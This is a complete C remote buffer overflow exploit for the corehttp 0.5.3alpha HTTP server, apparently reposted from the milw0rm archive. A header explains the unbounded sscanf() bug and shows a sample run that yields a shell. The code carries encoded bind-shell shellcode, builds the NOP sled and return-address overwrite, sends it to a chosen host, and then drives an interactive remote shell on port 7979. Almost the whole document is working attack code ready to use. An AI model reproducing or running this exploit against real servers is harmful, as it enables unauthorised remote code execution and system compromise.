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corehttp 0.5.3alpha (httpd) Remote Buffer Overflow Exploit

corehttp 0.5.3alpha (httpd) Remote Buffer Overflow Exploit

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/*[ corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. ]**********
*                                     *
* by: vade79/v9 [email]v9@fakehalo.us[/email] (fakehalo/realhalo)            *
*                                     *
* compile:                                *
* gcc xcorehttp.c -o xcorehttp                      *
*                                     *
* syntax:                                 *
* ./xcorehttp [-r] -h host -p port                    *
*                                     *
* corehttp homepage/url:                         *
* [url]http://corehttp.sourceforge.net/[/url]                    *
*                                     *
* bug(http.c):                              *
* ----------------------------------------------------------------------- *
* struct sprock_t *HttpSprockMake(struct sprock_t *parentsprock) {    *
*   struct sprock_t *sprocket;                     *
*   char req[PATHSIZE], url[PATHSIZE], status[PATHSIZE], temp[BUFSIZE], *
* ...                                   *
*   if ((sprocket = (struct sprock_t *)                 *
*     malloc(sizeof(struct sprock_t))) == NULL) return NULL;     *
* ...                                   *
*   sscanf(parentsprock->buffer, "%[A-Za-z] %s%*[ \t\n]", req, url);  *
* !(the bug/overwrite) --------------------------------------^----^    *
*   strncpy(sprocket->parent->url, url, PATHSIZE);           *
* !(the problem) -^                            *
* ...                                   *
*   for (i = 0; req[i] != '\0'; i++)                  *
*     req[i] = toupper(req[i]);                    *
* !(another problem) -^                          *
* ...                                   *
* }                                    *
* ----------------------------------------------------------------------- *
*                                     *
* explaination:                              *
* the sscanf() call in the above code contains no bounds checks for   *
* writing to either req[] or url[] (i chose url[] as it gave more room  *
* to work with, by overwriting into req[], and isnt limited to      *
* alphabetical characters only)                     *
*                                     *
* the first problem is that this overflows into the *sprocket structure *
* pointer, which is used immediately after the overflow. this is    *
* automatically calculated in this exploit, using the same location in  *
* memory with an offset. (+512 to ret address, which points to the nops) *
*                                     *
* the second problem is all lowercase characters get uppercased, this  *
* will happen weither or not you overwrite via req[] or url[]. if the  *
* return address contains a lowercase character it will uppercase it.  *
*                                     *
* this exploit has 256(%4) bytes of working room, so avoiding lowercase *
* characters should be doable.                      *
*                                     *
* note:                                 *
*  there are two areas in the stack this will appear, the one closer   *
*  to the top of the stack should be used.                *
*                                     *
* example usage:                             *
*  [v9@fhalo v9]$ gcc xcorehttp.c -o xcorehttp              *
*  [v9@fhalo v9]$ ./xcorehttp -h dual.fakehalo.lan -p 5555        *
*  [*] corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit.   *
*  [*] by: vade79/v9 [email]v9@fakehalo.us[/email] (fakehalo/realhalo)         *
*                                     *
*  [*] target           : dual.fakehalo.lan:5555       *
*  [*] return address       : 0xbfffea60             *
*  [*] *sprocket replacement    : 0xbfffec60             *
*                                     *
*  [*] attempting to connect: dual.fakehalo.lan:5555.          *
*  [*] successfully connected: dual.fakehalo.lan:5555.          *
*  [*] sending string:                          *
*  [+] "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n"      *
*  [*] closing connection.                        *
*                                     *
*  [*] attempting to connect: dual.fakehalo.lan:7979.          *
*  [*] successfully connected: dual.fakehalo.lan:7979.          *
*                                     *
*  Linux fhlnxd 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unkn$ *
*  uid=501(v9) gid=501(v9) groups=501(v9)                *
*                                     *
* (...nothing like a overly complex exploit to quench my brain thirst.  *
* although, i didn't do any support for randomized memory addresses, oh  *
* well)                                  *
***************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <getopt.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define BUFSIZE (2+512+16+256+4)
#define TIMEOUT 10
#define SPORT 7979

#define DFL_RETADDR 0xbfffea60

/* globals. */

/* linux_ia32_bind - LPORT=7979 Size=243 Encoder=PexAlphaNum */
/* [url]http://metasploit.com[/url] */
/* filt: 0x00 0x0a 0x0d 0x2b 0x25 0x3f 0x20 0x2f 0x09 (0x61-0x7a) */
static char x86_bind[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x53\x4b\x4d\x43\x35"
"\x43\x44\x43\x35\x4c\x56\x44\x50\x4c\x56\x48\x46\x4a\x45\x49\x39"
"\x49\x48\x41\x4e\x4d\x4c\x42\x38\x48\x49\x43\x44\x44\x35\x48\x36"
"\x4a\x56\x4f\x31\x4b\x52\x48\x46\x43\x45\x49\x48\x41\x4e\x4c\x36"
"\x48\x56\x4a\x35\x42\x55\x41\x55\x48\x55\x49\x48\x41\x4e\x4d\x4c"
"\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x42\x38\x44\x55"
"\x44\x45\x48\x45\x43\x34\x49\x58\x41\x4e\x42\x4b\x48\x56\x4d\x4c"
"\x42\x38\x43\x39\x4c\x36\x44\x30\x49\x55\x42\x4b\x4f\x53\x4d\x4c"
"\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b\x4b\x30\x44\x55\x4a\x56"
"\x4f\x32\x4f\x52\x43\x57\x4a\x46\x4a\x36\x4f\x42\x44\x56\x49\x46"
"\x50\x46\x49\x48\x43\x4e\x44\x55\x43\x45\x49\x38\x41\x4e\x4d\x4c"
"\x42\x58\x5a";

struct{
unsigned int addr;
char *host;
unsigned short port;
}tbl;

/* lonely extern. */
extern char *optarg;

/* functions. */
char *getbuf(unsigned int);
unsigned short corehttp_connect(char *,unsigned short);
signed int getshell_conn(char *,unsigned short);
void proc_shell(signed int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm/timeout hit.",1);}

/* start. */
int main(int argc,char **argv){
signed int chr=0,rsock=0;

printf("[*] corehttp[v0.5.3alpha]: httpd remote buffer overflo"
"w exploit.\n[*] by: vade79/v9 [email]v9@fakehalo.us[/email] (fakehalo/realhalo)"
"\n\n");

tbl.addr=DFL_RETADDR;

while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){
switch(chr){
  case &#39;h&#39;:
  if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
   printe("main(): allocating memory failed",1);
  break;
  case &#39;p&#39;:
  tbl.port=atoi(optarg);
  break;
  case &#39;r&#39;:
  sscanf(optarg,"%x",&tbl.addr);
  break;
  default:
  usage(argv[0]);
  break;
}
}
if(!tbl.host||!tbl.port)usage(argv[0]);
if(tbl.addr%4)printe("return address must be a multiple of 4.",1);
if((tbl.addr&0x000000ff)!=toupper((tbl.addr&0x000000ff)) ||
((tbl.addr&0x0000ff00)>>8)!=toupper(((tbl.addr&0x0000ff00)>>8)) ||
((tbl.addr&0x00ff0000)>>16)!=toupper(((tbl.addr&0x00ff0000)>>16)) ||
((tbl.addr&0xff000000)>>24)!=toupper(((tbl.addr&0xff000000)>>24)))
printe("return address contains a lowercase character.",1);

printf("[*] target\t\t\t: %s:%d\n",tbl.host,tbl.port);
printf("[*] return address\t\t: 0x%.8x\n",tbl.addr);
printf("[*] *sprocket replacement\t: 0x%.8x\n\n",(tbl.addr+512));

corehttp_connect(tbl.host,tbl.port);
rsock=getshell_conn(tbl.host,SPORT);
if(rsock>0)proc_shell(rsock);
exit(0);
}

/* make buf: */
/* "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" */
char *getbuf(unsigned int addr){
unsigned int i=0;
char *buf;
if(!(buf=(char *)malloc(BUFSIZE+1)))
printe("getbuf(): allocating memory failed.",1);
memset(buf,0,BUFSIZE);

/* needed to match the sscanf(); */
memcpy(buf,"X ",2);

/* make [NOPS+SHELLCODE], 512 bytes, overwrites url[256] AND req[256], */
/* right up until the &#39;struct sprock_t *sprocket&#39; pointer */
memset(buf+2,&#39;\x90&#39;,(513-sizeof(x86_bind)));
memcpy(buf+2+(513-sizeof(x86_bind)),x86_bind,strlen(x86_bind));

/* replaces the *sprocket pointer, really only needed at 524[4], the */
/* first ones are fillers. */
for(i=0;i<16;i+=4){
*(long *)&buf[2+512+i]=(addr+512);
}

/* the *sprocket pointer will now point to this, which goes to the */
/* shellcode. */
for(i=0;i<256;i+=4){
*(long *)&buf[2+512+16+i]=addr;
}

/* needed to be interpreted by corehttp. */
memcpy(buf+2+512+16+256,"\r\n\r\n",4);

/* send it on its way. */
return(buf);
}

/* connects to the vulnerable corehttp server. */
unsigned short corehttp_connect(char *hostname,unsigned short port){
signed int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
  printe("couldn&#39;t resolve hostname.",1);
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("corehttp/httpd connection failed.",1);
alarm(0);
printf("[*] successfully connected: %s:%d.\n",hostname,port);
sleep(1);
printf("[*] sending string:\n");
printf("[+] \"X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\\r\\n"
"\\r\\n\"\n");
write(sock,getbuf(tbl.addr),BUFSIZE);
sleep(1);
printf("[*] closing connection.\n\n");
close(sock);
return(0);
}

/* connects to bindshell. */
signed int getshell_conn(char *hostname,unsigned short port){
signed int sock=0;
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell_conn(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
  printe("getshell_conn(): couldn&#39;t resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
exit(1);
}
alarm(0);
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
return(sock);
}

/* process the bindshell. */
void proc_shell(signed int sock){
signed int r=0;
char buf[4096+1];
fd_set fds;
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
  printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
  if((r=read(0,buf,4096))<1)
  printe("getshell(): read() failed.",1);
  if(write(sock,buf,r)!=r)
  printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
  if((r=read(sock,buf,4096))<1)exit(0);
  write(1,buf,r);
}
}
close(sock);
return;
}

/* error! */
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}

/* usage. */
void usage(char *progname){
printf("syntax: %s [-r] -h host -p port\n\n",progname);
printf(" -h <host/ip>\ttarget hostname/ip.\n");
printf(" -p <port>\ttarget port.\n");
printf(" -r <addr>\tdefine return address. (0x%.8x)\n\n",tbl.addr);
exit(0);
}

// milw0rm.com [2007-07-29]

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